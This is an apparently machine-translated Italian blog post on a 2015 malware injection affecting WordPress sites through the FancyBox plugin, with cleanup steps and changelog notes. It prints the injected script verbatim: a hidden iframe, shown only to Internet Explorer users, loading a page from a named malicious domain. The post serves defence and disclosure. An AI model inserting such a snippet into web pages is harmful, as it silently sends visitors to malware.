All'inizio di questa settimana una serie di siti web e blog WordPress, ha ricevuto avvisi da infezione da malware attraverso Google Webmaster.
Il problema che Google Webmaster di cui è la presenza di un codice / copione malware iframe la pagina web sorgente.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Sembra che sia un vulnerabilità a plug-inacquis FancyBox per WordPress fino a ieri (05.02.2015) non era stato aggiornato per lungo tempo.
La soluzione di questo problema e disinfezione virus siti con questo malware, è relativamente semplice.
1. Disabilita il plugin FancyBox.
2. Elimina tutti i file di plugin FancyBox dal server (tramite FTP)
3. Installa la nuova versione del plugin (Fancybox 3.0.4)
FancyBox per WordPress 3.0.4
- Rinominata l'impostazione interessata dal problema di sicurezza menzionato in 3.0.3. Ciò dovrebbe impedire la visualizzazione del codice dannoso sui siti in cui si trova il plug-in updated senza rimuovere il codice dannoso.
FancyBox per WordPress 3.0.3
- Risolto un problema di sicurezza.
Informazioni sul malware:
TIPO: Iframe reindirizzamento
TARGET: WordPress Scatola fantasia
DOMINIO MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODICI:
MALWARE SCRITTO: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Rimuovi il malware dal tuo WordPress sito web.